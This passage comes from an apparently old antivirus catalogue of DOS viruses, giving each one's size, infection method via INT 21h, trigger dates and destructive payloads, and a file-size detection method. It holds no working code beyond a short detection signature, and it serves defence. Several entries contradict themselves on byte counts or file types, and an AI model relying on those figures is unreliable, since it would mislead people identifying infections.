  5132. Virus Name: NCU_Li
  5133. Other names: None
  5134. Virus Type: File Virus
  5135. Virus Length: 1690/1670 bytes
  5136. PC Vectors Hooked: Int 21
  5137.  
  5138. Execution Procedure:
  5139. 1) The virus checks whether it is already loaded resident in memory.
  5140.     If "No", it then loads itself resident into memory by hooking INT
  5141.     21h.
  5142. 2) It then executes the original file.
  5143. 3) With itself loaded resident into memory it will infect any
  5144.     uninfected file that is executed.
  5145.  
  5146. Damage: None
  5147.  
  5148. Detection method: Increase infected files size by 1690/1670 bytes.
  5149.  
  5150. Note: Loads itself  resident in memory.  An error message appears if
  5151. there is an I/O error (such as write protect).
  5152.  
  5153. [Ghost-A]
  5154. Virus Name: GHOST-A
  5155. Other names: None
  5156. Virus Type: File Virus
  5157. Virus Length: 330 bytes
  5158.  
  5159. Execution Procedure:
  5160. 1) The virus checks whether it is already loaded resident in memory.
  5161.     If "No", it then loads itself resident into memory by hooking INT
  5162.     21h.
  5163. 2) It then executes the original file.
  5164. 3) With itself loaded resident into memory it will infect any
  5165.     uninfected file that is executed.
  5166.  
  5167. Damage: The executed file will be deleted after the virus has resided
  5168. in the memory and the system date is Friday. Virus then halts the
  5169. system.
  5170.  
  5171. Detection method: Increase in infected file size by 330 bytes.
  5172.  
  5173. Note:
  5174. 1) Loads itself resident in memory.  An error message appears if
  5175.     there is an I/O error (such as write protect).
  5176.  
  5177. [VVF34]
  5178. Virus Name: VVF34
  5179. Other names: None
  5180. Virus Type: File Virus
  5181. Virus Length: 1614-1624 bytes (EXE), 1614 bytes (COM)
  5182.  
  5183. Execution Procedure:
  5184. 1) The virus checks whether it is already loaded resident in memory.
  5185.     If "No", it then loads itself resident into memory by hooking INT
  5186.     21h.
  5187. 2) It then executes the original file.
  5188. 3) With itself loaded resident into memory it will infect any
  5189.     uninfected file that is executed.
  5190.  
  5191. Damage: The virus hooks 1Ch.  After the virus has resided in memory
  5192. for 5 minutes and 15 files have already been infected, the virus will
  5193. proceed to draw a portrait in the center of the screen.  The virus
  5194. will also hook interrupt 9h (keyboard interrupt). The virus will then
  5195. display the following message when the user presses any key: "Bu, Bu,
  5196. Bu..."
  5197.  
  5198. Detection method: Increases infected file size by 1614/1624 bytes.
  5199.  
  5200. Note:  Loads itself resident in memory.  An error message appears if
  5201. there is an I/O error (such as write protect).
  5202.  
  5203. [Damage-B]
  5204. Virus Name: DAMAGE-B
  5205. Other names: None
  5206. Virus Type: Parasitic Virus
  5207. Virus Length: 1110 bytes
  5208.  
  5209. Execution Procedure:
  5210. 1) The virus checks whether it is already loaded resident in memory.
  5211.     If "No", it then loads itself resident into memory by hooking INT
  5212.     21h.
  5213. 2) It then executes the original file.
  5214. 3) With itself loaded resident into memory it will infect any
  5215.     uninfected file that is executed.
  5216.  
  5217. Damage: Virus checks the system date.  If it is Tuesday, it will format
  5218. the hard disk.
  5219.  
  5220. Detection method: Increases infected file size by 1110 bytes.
  5221.  
  5222. Note:  Loads itself resident in memory.  An error message appears if
  5223. there is an I/O error (such as write protect).
  5224.  
  5225. [Fam1]
  5226. Virus Name: FAM1
  5227. Other names: None
  5228. Virus Type: File Virus
  5229. Virus Length: 1063 bytes
  5230.  
  5231. Execution Procedure:
  5232. 1) The virus checks whether it is already loaded resident in memory.
  5233.     If "No", it then loads itself resident into memory by hooking INT
  5234.     21h.
  5235. 2) It then executes the original file.
  5236. 3) With itself loaded resident into memory it will infect any
  5237.     uninfected file that is executed.
  5238.  
  5239. Damage: None
  5240.  
  5241. Detection method: Increases infected file size by 1036 bytes.  This
  5242. only occurs with a MONO display card.
  5243.  
  5244. Note:  Loads itself resident in memory.  An error message appears if
  5245. there is an I/O error (such as write protect).
  5246.  
  5247. [Malaise]
  5248. Virus Name: MALAISE
  5249. Other names: None
  5250. Virus Type: File Virus
  5251. Virus Length: 1335/1365 bytes
  5252.  
  5253. Execution Procedure:
  5254. 1) The virus checks whether it is already loaded resident in memory.
  5255.     If "No", it then loads itself resident into memory by hooking INT
  5256.     21h.
  5257. 2) It then executes the original file.
  5258. 3) With itself loaded resident into memory it will infect any
  5259.     uninfected file that is executed.
  5260.  
  5261. Damage: None
  5262.  
  5263. Detection method: Increases infected files size by 1335-1365 bytes.
  5264.  
  5265. Note:  Loads itself resident in memory.  An error message appears if
  5266. there is an I/O error (such as write protect).
  5267.  
  5268. [Walker]
  5269. Virus Name: WALKER
  5270. Other names: None
  5271. Virus Type: File Virus
  5272. Virus Length: 3845 bytes (EXE), 3852 bytes (COM)
  5273.  
  5274. Execution Procedure:
  5275. 1) The virus checks whether it is already loaded resident in memory.
  5276.     If "No", it then loads itself resident into memory by hooking
  5277.     INT 21h.
  5278. 2) It then executes the original file.
  5279. 3) With itself loaded resident into memory it will infect any
  5280.     uninfected file that is executed.
  5281.  
  5282. Damage: None
  5283.  
  5284. Detection method: Interrupt 16 will be hooked. A man walking across
  5285. the screen for the duration of 14 seconds will occasionally be
  5286. displayed. Increases infected file size by 3845/3852 bytes.
  5287.  
  5288. Note:  Loads itself resident in memory. An error message appears if
  5289. there is an I/O error (such as write protect).
  5290.  
  5291. [Proto-T]
  5292. Virus Name: PROTO-T
  5293. Other names: None
  5294. Virus Type: File Virus
  5295. Virus Length: 695 bytes (COM)
  5296.  
  5297. Execution Procedure:
  5298. 1) The virus checks whether it is already loaded resident in memory. If
  5299.     "No", it then loads itself resident into memory by hooking INT
  5300.     21h.
  5301. 2) It then executes the original file.
  5302. 3) With itself loaded resident into memory it will infect any
  5303.     uninfected file that is executed.
  5304.  
  5305. Damage: None
  5306.  
  5307. Detection method: Increases infected files size by 695 bytes.
  5308.  
  5309. Note:  Loads itself resident in memory.  An error message appears if
  5310. there is an I/O error (such as write protect).
  5311.  
  5312. [QMU]
  5313. Virus Name: QMU
  5314. Other names: None
  5315. Virus Type: Multi-partite Virus
  5316. Virus Length: 1513 bytes (COM)
  5317.  
  5318. Execution Procedure:
  5319. 1) The virus checks whether it is already loaded resident in memory.
  5320.     If "No", it then loads itself resident into memory by hooking
  5321.     INT 21h.
  5322. 2) It then executes the original file.
  5323. 3) With itself loaded resident into memory it will infect any
  5324.     uninfected file that is executed.
  5325.  
  5326. Damage: Hard disk cannot be booted after the virus internal counter
  5327. reaches 100.
  5328.  
  5329. Detection method: Increases infected file size by 1513 bytes.
  5330.  
  5331. Note:  Loads itself resident in memory.  An error message appears if
  5332. there is an I/O error (such as write protect).
  5333.  
  5334. [492]
  5335. Virus Name: 492
  5336. Other names: None
  5337. Virus Type: File Virus
  5338. Virus Length: 492 bytes (COM)
  5339.  
  5340. Execution Procedure:
  5341. 1) The virus checks whether it is already loaded resident in memory.
  5342.     If "No", it then loads itself resident into memory by hooking INT
  5343.     21h.
  5344. 2) It then executes the original file.
  5345. 3) With itself loaded resident into memory it will infect any
  5346.     uninfected file that is executed.
  5347.  
  5348. Damage: Virus will check the system date. If it is the 14th day of
  5349. the month and it is a Saturday, the virus will erase all data on the
  5350. hard disk.
  5351.  
  5352. Detection method: Increases infected file size by 492 bytes.
  5353.  
  5354. Note: Loads itself resident in memory.  An error message appears if
  5355. there is an I/O error (such as write protect).
  5356.  
  5357. [Reaper]
  5358. Virus Name: REAPER
  5359. Other names: None
  5360. Virus Type: File Virus
  5361. Virus Length: 1072 bytes
  5362.  
  5363. Execution Procedure:
  5364. 1) The virus checks whether it is already loaded resident in memory. If
  5365.     "No", it then loads itself resident into memory by hooking INT 21h.
  5366. 2) It then executes the original file.
  5367. 3) With itself loaded resident into memory it will infect any
  5368.     uninfected file that is executed.
  5369.  
  5370. Damage: The Reaper virus will check the system date after it resides in
  5371. memory. If it is Aug 21, the virus will display the following message:
  5372. "Reaper Man. (c) 92, Apache Warrior, ARCV Pres."
  5373.  
  5374. Detection method: Increases infected file size by 1072 bytes.
  5375.  
  5376. Note: Loads itself resident in memory.  An error message appears if
  5377. there is an I/O error (such as write protect).
  5378.  
  5379. [Jump4Joy]
  5380. Virus Name: JUMP4JOY
  5381. Other names: None
  5382. Virus Type: File Virus
  5383. Virus Length: 1273 bytes (COM)
  5384.  
  5385. Execution Procedure:
  5386. 1) The virus checks whether it is already loaded resident in memory.
  5387.     If "No", it then loads itself resident into memory by hooking
  5388.     INT 21h.
  5389. 2) It then executes the original file.
  5390. 3) With itself loaded resident into memory it will infect any
  5391.     uninfected file that is executed. b) It doesn't infect .EXE files.
  5392.  
  5393. Damage: None
  5394.  
  5395. Detection method: Increases infected file size by 1273 bytes.
  5396.  
  5397. Note:  Loads itself resident in memory.  An error message appears if
  5398. there is an I/O error (such as write protect).
  5399.  
  5400. [Aragorn]
  5401. Virus Name: ARAGORN
  5402. Other names: None
  5403. Virus Type: Boot Strap Sector Virus
  5404. Damage: None
  5405.  
  5406. Infection method: Only floppy diskette in drive A will be infected.
  5407.  
  5408. [Trash]
  5409. Virus Name: TRASH
  5410. Other names: None
  5411. Virus Type: Boot Strap Sector Virus
  5412. Virus Length: 1241 bytes
  5413.  
  5414. Damage: Virus will overwrite the Partition Table.
  5415.  
  5416. Detection method: Virus will not infect any files. Virus will display
  5417. the following message: "Warning!!!  This program will zero (DESTROY)
  5418. the master boot record of your first hard disk. The purpose of this is
  5419. to test the anti-virus software, so be sure you have installed your
  5420. favorite protecting program before running this one!  It is almost
  5421. certain that it will fail to protect you anyway. Press any key to abort,
  5422. or press Ctrl-Alt-Right Shift- F5 to proceed at your own risk." Virus
  5423. will proceed to overwrite the Partition Table if user presses
  5424. Ctrl-Alt-Right Shift-F5.
  5425.  
  5426. [Data Crime]
  5427. Virus Name: Datacrime
  5428. Other names: 1168, Columbus Day
  5429. Virus Type: File Virus
  5430. Virus Length: 1168 bytes
  5431.  
  5432. Execution Procedure:
  5433. 1) The virus checks whether it is already loaded resident in memory. If
  5434.     "No", it then loads itself resident into memory by hooking INT 21h.
  5435. 2) It then executes the original file.
  5436. 3) With itself loaded resident into memory it will infect any
  5437.     uninfected file that is executed. b) It doesn't infect .EXE files.
  5438.  
  5439. Damage: Virus will low-level format your hard disk after October 12.
  5440.  
  5441. Detection method: Virus infects all .COM files between April 1st-October
  5442. 12th.  After October 12th, it  will display the following message:
  5443. "DATACRIME VIRUS Released:1 March 1989." It will then low-level format
  5444. your hard disk.
  5445.  
  5446. Note:  Loads itself resident in memory.  An error message appears if
  5447. there is an I/O error (such as write protect).
  5448.  
  5449. [Datacrime II]
  5450. Virus Name: Datacrime II
  5451. Other names: None
  5452. Virus Type: File Virus
  5453. Virus Length: Increases .COM and .EXE files by 1514 bytes.
  5454.  
  5455. Damage: Virus will low-level format cylinder 0 of your hard disk
  5456. after October 12.
  5457.  
  5458. Detection method: Between October 12th-31st, excluding Mondays, the
  5459. virus will display the following message: "DATACRIME-2 VIRUS."  The
  5460. virus will proceed to low-level format cylinder  0 of the hard disk.
  5461. Then the system will hang.
  5462.  
  5463. [Marauder]
  5464. Virus Name: Marauder
  5465. Other names: None
  5466. Virus Type: File Virus
  5467. Virus Length: Increases .COM file by 860 bytes.
  5468.  
  5469. Execution Procedure:
  5470. 1) The virus searches the current directory for a .COM file.  Once it
  5471.     locates a file it checks whether it is already infected by the
  5472.     Marauder virus. If "No", it then infects the file.
  5473. 2) If "Yes" then it searches for another .COM file to infect. b) It
  5474.     doesn't infect .EXE files.
  5475. 3) It then executes the original file.
  5476.  
  5477. Damage: The Marauder virus will overwrite your files every February 2
  5478. with the string "=[Marauder] 1992 Hellraiser -Phalcon/Skism."
  5479.  
  5480. Detection method: When the infected file is executed, the virus will
  5481. infect the first uninfected .COM file in the current directory.
  5482. Every February 2, the virus will overwrite all executed files by
  5483. following characters one by one "=[Aarauder] 1992 Hellraiser -
  5484. Phalcon/skism."
  5485.  
  5486. [Oropax]
  5487. Virus Name: Oropax
  5488. Other names: None
  5489. Virus Type: File Virus
  5490. Virus Length: 2756-2800 bytes
  5491.  
  5492. Execution Procedure:
  5493. 1) The virus checks whether it is already loaded resident in memory.
  5494.     If "No", it then loads itself resident into memory by hooking
  5495.     INT 21h.
  5496. 2) It then executes the original file.
  5497. 3) With itself loaded resident into memory it will infect any
  5498.     uninfected file that is executed. b) It doesn't infect .EXE files.
  5499.  
  5500. Damage: Infected .COM file sizes increase by 2756-2800 bytes.
  5501.  
  5502. Detection method: Virus will hook interrupt 20h, 21h, 27h. If the
  5503. system date is after May 1, 1987 and it is an IBM-compatible computer,
  5504. interrupt 8h will be hooked. When the virus is triggered, it will play
  5505. the "Stars", "Blue" and "Forty" songs one by one every eight minutes.
  5506.  
  5507. Note:  Loads itself resident in memory.  An error message appears if
  5508. there is an I/O error (such as write protect).
  5509.  
  5510. [dBASE]
  5511. Virus Name: dBASE
  5512. Other names: None
  5513. Virus Type: File Virus
  5514. Virus Length: 1864 bytes
  5515.  
  5516. Execution Procedure:
  5517. 1) The virus checks whether it is already loaded resident in memory. If
  5518.     "No", it then loads itself resident into memory by hooking INT
  5519.     21h.
  5520. 2) It then executes the original file.
  5521. 3) With itself loaded resident into memory it will infect any
  5522.     uninfected file that is executed. b) It doesn't infect .EXE files.
  5523.  
  5524. Damage: Every executed .COM file increases by 1864 bytes. Virus will
  5525. sometimes cause system to halt.
  5526.  
  5527. Detection method: Virus will hook interrupt 21h. When the virus is
  5528. activated, it will switch high-byte and low-byte of every opened .DBF
  5529. data files.  Virus will also create a hidden file - "BUG.DAT" in the
  5530. root directory of every infected .DBF file name.
  5531.  
  5532. Note:  Loads itself resident in memory.  An error message appears if
  5533. there is an I/O error (such as write protect).
  5534.  
  5535. [Halloween]
  5536. Virus Name: Halloween
  5537. Other names: Happy Halloween
  5538. Virus Type: File Virus
  5539. Virus Length: N/A
  5540.  
  5541. Execution Procedure:
  5542. 1) The virus checks whether it is already loaded resident in memory. If
  5543.     "No", it then loads itself resident into memory by hooking INT 21h.
  5544. 2) It then executes the original file.
  5545. 3) With itself loaded resident into memory it will infect any
  5546.     uninfected file that is executed.
  5547.  
  5548. Damage: Virus finds an executable file (first .EXE file then .COM) in
  5549. current directory and proceeds to infect it.  It will display "Runtime
  5550. error 002 at 0000:0511" on screen if no uninfected files are found.
  5551.  
  5552. Detection method: Every Oct 31, the virus will create a 10KB-long file
  5553. and display "Runtime error 150 at 0000:0AC8."
  5554.  
  5555. Note:
  5556. 1) Loads itself resident in memory.  An error message appears if
  5557.     there is an I/O error (such as write protect).
  5558.  
  5559. [Kennedy]
  5560. Virus Name: Kennedy
  5561. Other names: None
  5562. Virus Type: File Virus
  5563. Virus Length: 333 bytes
  5564.  
  5565. Execution Procedure:
  5566. 1) The virus checks whether it is already loaded resident in memory. If
  5567.     "No", it then loads itself resident into memory by hooking INT 21h.
  5568. 2) It then executes the original file.
  5569. 3) With itself loaded resident into memory it will infect any
  5570.     uninfected file that is executed.
  5571.  
  5572. Damage: Virus destroys FAT.
  5573.  
  5574. Detection method: On June 6, November 8, and November 22, the virus
  5575. will display the following message:
  5576.  
  5577.     "Kennedy is dead - long live the Dead Kennedys."
  5578.  
  5579. Virus proceeds to destroy FAT.
  5580.  
  5581. Note:  Loads itself resident in memory.  An error message appears if
  5582. there is an I/O error (such as write protect).
  5583.  
  5584. [Virus-90]
  5585. Virus Name: Virus-90
  5586. Other names: None
  5587. Virus Type: File Virus
  5588. Virus Length: 857 bytes (COM)
  5589.  
  5590. Execution Procedure:
  5591. 1) The virus checks whether it is already loaded resident in memory.
  5592.     If "No", it then loads itself resident into memory by hooking
  5593.     INT 21h.
  5594. 2) It then executes the original file.
  5595. 3) With itself loaded resident into memory it will infect any
  5596.     uninfected file that is executed. b) It doesn't infect .EXE
  5597.     files.
  5598.  
  5599. Damage: Infected .COM files increase by 857 bytes.
  5600.  
  5601. Detection method: Virus displays "Infected" when a file gets infected.
  5602.  
  5603. Note:
  5604. 1) Loads itself resident in memory.  An error message appears if
  5605.     there is an I/O error (such as write protect).
  5606.  
  5607. [Lehigh]
  5608. Virus Name: Lehigh
  5609. Other names: None
  5610. Virus Type: Parasitic Virus (infects COMMAND.COM only)
  5611. Virus Length: 555 bytes
  5612.  
  5613. Execution Procedure:
  5614. 1) The virus checks whether it is already loaded resident in memory.
  5615.     If "No", it then loads itself resident into memory by hooking
  5616.     INT 21h.
  5617. 2) Then when a disk is accessed and if COMMAND.COM is uninfected it
  5618.     will immediately infect it and execute the original file.
  5619. 3) With itself loaded resident into memory it checks for any
  5620.     uninfected file that is executed.  b) It doesn't infect .EXE
  5621.     files.
  5622.  
  5623. Damage:
  5624. 1) Infects the disk's COMMAND.COM file and increases its size by
  5625.     555 bytes.
  5626. 2) When the infection count is more than four the current disk will
  5627.     be trashed.
  5628.  
  5629. [Como]
  5630. Virus Name: Como
  5631. Virus Type: File Virus
  5632. Virus Length: 2,020/2,030 bytes (EXE)
  5633. PC Vectors Hooked:  None
  5634.  
  5635. Execution Procedure:
  5636. 1) It searches for an EXE file in the current directory.
  5637. 2) Then it checks if the file has been infected. If Yes", it continues
  5638.     to search.
  5639. 3) If an uninfected file is found, there is 50% probability for the
  5640.     file to get infected.
  5641.  
  5642. Infection Procedure:
  5643. 1) The virus infects files by AH=4B in INT 21h. When running an
  5644.     uninfected program, the program will get infected.
  5645. 2) Before infecting files, the virus displays: "It's your task to find
  5646.     and delete them, best wishes. Press a key to execute the prompt."
  5647.  
  5648. Damage:  None
  5649.  
  5650. Detection method:  Check if the file length increases by 2,020/2,030
  5651. bytes.
  5652.  
  5653. Remarks:
  5654. 1) Non memory resident.
  5655. 2) Before infecting files, the virus hooks INT 24h in order to omit
  5656.     the I/O error messages.
  5657.  
  5658. [512]
  5659. Virus Name: 512
  5660. Virus Type: File Virus
  5661. Virus Length: 512 bytes
  5662. Symptoms: None
  5663.  
  5664. Execution Procedure: Virus does not contain any damage routine,
  5665. but its spreading mechanism presents a great danger to the
  5666. infected file. The beginning is saved outside the file in free
  5667. space in the allocated cluster.  When copying such a program,
  5668. this part is not copied together with the rest of the file,
  5669. causing the original program to be destroyed.
  5670.  
  5671. Other manifested problems to files are: when an infected file is
  5672. read with the virus already in the memory, it tests as a virus
  5673. flag only the time of the last modification (62 seconds) and not
  5674. the actual file content.  The same virus flag is used by viruses
  5675. 648 and 1560 and some users have their programs immunized
  5676. against virus 648.  The result is that, the nonsense data which
  5677. lies at the end of an infected file will be read rather than the
  5678. actual file content.
  5679.  
  5680. [744]
  5681. Virus Name: 744
  5682. Virus Type: Parasitic Virus
  5683. Virus Length: 744 bytes
  5684.  
  5685. Symptoms: Increases infected file sizes by 744 bytes. Destroyed
  5686. programs will cause computer to crash in most cases.
  5687.  
  5688. Damage: With the probability of 1:7 the virus will not infect
  5689. other files but will destroy the founded file.  Virus writes the
  5690. instruction JMP [BP+0] at the start of program. Virus contains an
  5691. error. It should write JMP F000:FFF0 instruction (computer
  5692. reboot - same as virus 648), which is 4 bytes from the actually
  5693. written instruction. Length of destroyed program is not changed.
  5694. This program contains a virus flag. Reads and writes using DOS
  5695. interrupts.  When virus finds a program which can be infected, it
  5696. reads and without any change writes to sector number  1 (FAT
  5697. area).  This is not done on the disk C:. It is done as a test
  5698. whether the disk is write protected or not.
  5699.  
  5700. [1800]
  5701. Virus Name: 1800
  5702. Other Names: Bulgarian virus, Sofia virus, Dark Avenger Virus
  5703. Type: Parasitic Virus
  5704. Virus Length: cca 1800 bytes
  5705.  
  5706. Symptoms: Increases infected file sizes by cca 1800 bytes (in the
  5707. case of EXE files it performs paragraph alignment).  Decreases
  5708. size of free RAM memory. Infected files contain the following
  5709. strings:
  5710.  
  5711.     "Eddie lives...somewhere in time!", "Diana P." a "This
  5712.      program was written in the city of Sofia (C) 1988-89 Dark
  5713.      Avenger."
  5714.  
  5715. Damage: Virus reads boot sector of the disk, and in it (offset
  5716. 10, OEM decimal version) marks the number of programs, which are
  5717. run from the given disk MOD 16.  If it is zero (after every 16
  5718. programs!!), it overwrites random cluster on the disk with part
  5719. of its own code.  The cluster number is then stored in the boot
  5720. sector at the position at offset 8 (OEM main version). Modifies
  5721. boot sector then writes back on the disk.
  5722.  
  5723.  
  5724. [V2000]
  5725. Virus Name: V2000
  5726. Other Names: 21 century virus
  5727. Virus Type: Parasitic Virus
  5728. Virus Length: 2000 bytes
  5729.  
  5730. Symptoms: Increases infected .COM and .EXE file sizes by 2000
  5731. bytes. Decreases size of free RAM memory by 4KB.  Infected files
  5732. contain the following strings:
  5733.  
  5734.     "(C) 1989 by Vesselin Bontchev"
  5735.  
  5736. Damage: None
  5737.  
  5738. [2343]
  5739. Virus Name: 2343
  5740. Other Names: Flip virus
  5741. Virus Type: Multi-partite Virus
  5742. Virus Length: 2343 bytes
  5743.  
  5744. Symptoms: Increases infected .COM and .EXE file sizes by 2343
  5745. bytes.  Decreases size of free RAM memory with 2864 bytes.  New
  5746. DOS function 0FE01h is implemented, when virus is active in
  5747. memory, it returns 01FEh in AX.  Word  028h in DPT sector
  5748. contains the value 0FE01h.  Flip virus has the same virus flag as
  5749. the viruses 648, 1560 (ALABAMA) and 512: it sets the number of
  5750. seconds in the file's time stamp to the nonsense value of 62.
  5751. Infected files contain the following strings:
  5752.  
  5753.     "OMICRON by PsychoBlast"
  5754.  
  5755. Damage: Under certain conditions virus "flips" the screen. If the
  5756. damage routine is active, virus contains bit reversed of screen
  5757. font 8*14 and monitors the interrupt 10h. When video mode is
  5758. changed to the mode 2 or 3 the special routine for interrupt 1Ch
  5759. is activated. All other video modes are interrupt vector 1Ch  set
  5760. to IRET instruction.  For video modes 2 and 3, the video start
  5761. address is set to 1000h.  The memory at segment 0BA00h is used as
  5762. video memory rather than 0B800h.  On every call of interrupt 1Ch
  5763. (18.2 times per second) virus copies 500 words (characters and
  5764. their attributes) from memory segment 0B800h into memory segment
  5765. 0BA00h with inversion of rows and columns.
  5766.  
  5767. [Pojer]
  5768. Virus Name: Pojer
  5769. Virus Type: Parasitic Virus
  5770. Virus Length: Infected EXE and COM files increase by 1919 Bytes
  5771. PC Vectors Hooked: INT 21h and INT 24h
  5772.  
  5773. Execution Procedure:
  5774. 1) Checks whether it already resides in memory. If not, hooks INT
  5775.     21h and resides in the highest memory, and then executes the
  5776.     host program.
  5777. 2) If it already resides in the highest memory, the host program
  5778.     will be executed immediately
  5779.  
  5780. Infection Procedure:
  5781. 1) The virus infects files by AH=4B in INT 21h. The uninfected
  5782.     files will be infected when they are executed.
  5783. 2) Before infecting files Pojer will hook INT 24h in order to
  5784.     ignore the I/O errors.
  5785.  
  5786. Damage:  None
  5787.  
  5788. Detection method:  Detectable if the lengths of files increase
  5789. by 1919 Bytes.
  5790.  
  5791. [Drop]
  5792. Virus Name: Drop
  5793. Virus. Type: Parasitic Virus.
  5794. Virus Length: Infected EXE file sizes increase by 1130-1155
  5795.                      Bytes and COM files increase by 1131 Bytes.
  5796. PC Vectors Hooked:  INT 21h
  5797.  
  5798. Execution Procedure:
  5799. 1) Checks whether it resides in memory or not. If not, hooks INT
  5800.     21h and resides in the highest memory, and then executes the
  5801.     host program (If it already resides in the highest memory, the
  5802.     host program will be executed directly).
  5803. 2) Then checks system date.  It will hook INT 21h if the date is
  5804.     "the sixth day of the month". The characters on the screen
  5805.     will drop and the system will hang when any program is
  5806.     executed.
  5807.  
  5808. Infection Procedure:
  5809. 1) The virus infects files by AH=4B in INT 21h. The non-infected
  5810.     files will be infected  when they are executed.
  5811. 2) Before infecting files Drop will not hook INT 24h. The error
  5812.     information will appear when I/O errors occur.
  5813.  
  5814. Damage:  Refer to Execution Procedure 2).
  5815.  
  5816. Detection method:  Detectable if the lengths of files increase
  5817. by 1130-1155 Bytes.
  5818.  
  5819. [Ha]
  5820. Virus Name: Ha
  5821. Virus Type: Parasitic Virus
  5822. Virus Length: Infected EXE file sizes increase by 1458-1468 Bytes
  5823.                      and COM files increase by 1462 Bytes.
  5824. PC Vectors Hooked:  INT 21h
  5825.  
  5826. Execution Procedure:
  5827. 1) Detects whether it has resided in memory.  If not, hooks INT
  5828.     21h and resides in the highest memory, and then executes the
  5829.     host program.
  5830. 2) If it has already resided in the highest memory, the program
  5831.     will be executed directly.
  5832.  
  5833. Infection Procedure:  The virus infects files by AH=4B in INT 21h.
  5834. The uninfected files will be infected when they are executed.
  5835.  
  5836. Damage:  None
  5837.  
  5838. Detection method: Detectable if the lengths of files increase by
  5839. 1458-1468 Bytes.
  5840.  
  5841. [LCT]
  5842. Virus Name: Lct
  5843. Virus Type: Parasitic Virus
  5844. Virus Length: Infected COM file sizes increase by 599 Bytes
  5845. PC Vectors Hooked: None
  5846.  
  5847. Execution Procedure:
  5848. 1) Searches for a COM files in the current directory.
  5849. 2) The virus checks  whether the file is infected or not.  If the
  5850.     file has been infected, the virus continues to search until an
  5851.     uninfected file is found and  then infects it.  The virus
  5852.     stops searching until the last COM file in the current
  5853.     directory is infected.
  5854.  
  5855. Damage: The virus checks the system date. If the date is "the
  5856. 25th of Dec.", every time an infected file is executed, only
  5857. the virus codes in the infected file is executed. The program
  5858. then ends. The host programs are not executed.
  5859.  
  5860. Detection method:  Detectable if the lengths of files increase
  5861. by 599 Bytes.
  5862.  
  5863. Remarks:
  5864. 1) Non memory resident.
  5865. 2) When infecting files, the virus does not hook INT 24h.  And
  5866.     the error information appears when I/O errors occur.
  5867.  
  5868. [NPOX-Var]
  5869. Virus Name: Npox-var
  5870. Virus Type: Parasitic Virus
  5871. Virus Length: Infected COM file sizes increase by 1000 Bytes
  5872. PC Vectors Hooked: None
  5873.  
  5874. Execution Procedure:
  5875. 1) The virus searches for a COM file in the current directory.
  5876. 2) The virus checks whether the file is infected. If the file has
  5877.     been infected, the virus continues to search until an
  5878.     uninfected file is found and then infects it. (The virus
  5879.     only infects one file at a time.)
  5880.  
  5881. Damage: None
  5882.  
  5883. Detection method:  Detectable if the lengths of files increase by
  5884. 1000 Bytes.
  5885.  
  5886. Remarks:
  5887. 1) Non memory resident.
  5888. 2) When infecting files, the virus does not hook INT 24h.  And
  5889.     the error information appears when I/O errors occur.
  5890. 3) The beginning of the virus is:
  5891.      INC         BX
  5892.      PUSH        AX
  5893.      POP         AX
  5894.      DEC         BX
  5895.      JMP         XXXX
  5896.  
  5897. [Bur-560h]
  5898. Virus Name: Bur-560h
  5899. Virus Type: Parasitic Virus
  5900. Virus Length: Infected COM files do not increase (Does not
  5901.                      infect EXE files).
  5902. PC Vectors Hooked: None
  5903.  
  5904. Execution Procedure:
  5905. 1) The virus searches for COM files through the current path.
  5906. 2) The virus checks whether the file is infected. If the file has
  5907.     been infected, the virus continues to search until an
  5908.     uninfected file is found and then infects it (It only infects
  5909.     one file at a time).
  5910.  
  5911. Damage:
  5912. The virus infects the files by covering up the original files, so
  5913. the lengths of the files do not increase and the functions of the
  5914. original files can not be executed.
  5915.  
  5916. Remarks:
  5917. 1) Non memory resident.
  5918. 2) When infecting files, the virus does not hook INT 24h.  And
  5919.     the error information appears when I/O errors occur.
  5920.  
  5921. [Benoit]
  5922. Virus Name: Benoit
  5923. Virus Type: Parasitic Virus
  5924. Virus Length: Infected COM file sizes increase by 1183 bytes
  5925.                      (Does not infect EXE files).
  5926. PC Vectors Hooked:  INT 21h
  5927.  
  5928. Execution Procedure:
  5929. 1) After entering memory, it checks whether it resides in memory.
  5930.     If not, the virus hooks INT 21h and resides in the high memory
  5931.     and then runs the host program.
  5932. 2) If the virus already resides in memory, the host programs will
  5933.     be executed directly.
  5934.  
  5935. Infection Procedure:
  5936. 1) Infects the file by "AH=4B" in INT 21h. When an uninfected
  5937.     file is executed, it will be infected (Does not infect COM
  5938.     files).
  5939. 2) When infecting files, the virus does not hook INT 24h. The
  5940.     error information will appear when I/O errors occur.
  5941.  
  5942. Damage: None
  5943.  
  5944. Detection method: Detectable when the lengths of files increase
  5945. by 1183 bytes.
  5946.  
  5947. [Hallo]
  5948. Virus Name: Hallo
  5949. Virus Type: Parasitic Virus
  5950. Virus Length: Infected COM file sizes increase by 496 Bytes.
  5951.                      (Does not infect EXE files.)
  5952. PC Vectors Hooked: None
  5953.  
  5954. Execution Procedure:
  5955. 1) Searches for a COM file in the current disk.
  5956. 2) Checks whether the file is infected.  If yes, continues to
  5957.     search until an uninfected file is found and then infects it.
  5958.     (only infects one file at a time). After the file is infected,
  5959.     the virus displays
  5960.  
  5961.     "I have got a virus for you!".
  5962.  
  5963. Damage: None
  5964.  
  5965. Detection method:
  5966. See if the string "I have got a virus for you!" displays when
  5967. executing programs and if the lengths of files increase by 599
  5968. Bytes.
  5969.  
  5970. Remarks:
  5971. 1) Non memory resident.
  5972. 2) When infecting files, the virus does not hook INT 24h.  Error
  5973.     message will appear when I/O errors occur.
  5974.  
  5975. [Allerbmu]
  5976. Virus Name: Allerbmu
  5977. Virus Type: Parasitic Virus
  5978. Virus Length: Infected COM file sizes increase by 359 Bytes.
  5979.                      (Does not infect EXE files.)
  5980. PC Vectors Hooked: None
  5981.  
  5982. Execution Procedure:
  5983. 1) Searches for a COM file in the current directory.
  5984. 2) Checks whether the file is infected.  If yes, the virus
  5985.     continues to search.
  5986. 3) If an uninfected file is found, the virus will proceed to
  5987.     infect it. (The virus only infects one file at a time).
  5988. 4) Checks the system date no matter whether an uninfected COM
  5989.     file is found or not.  When the date is 'Monday', the virus
  5990.     destroys all files on the hard disk, and then displays the
  5991.     following message:
  5992.  
  5993.     "+ ALLERBMU NORI +(c) 1991........................"
  5994.  
  5995. Damage: Refer to Execution Procedure 4).
  5996.  
  5997. Detection method:  Detectable if the lengths of files increase by
  5998. 359 Bytes.
  5999.  
  6000. Remarks:
  6001. 1) Non memory resident.
  6002. 2) When infecting files, the virus does not hook INT 24h.  Error
  6003.     message will appear when I/O errors occur.
  6004.  
  6005. [Findm-608]
  6006. Virus Name: Findm-608
  6007. Virus Type: Parasitic Virus
  6008. Virus Length: Infected COM file sizes increase by 608-623 Bytes.
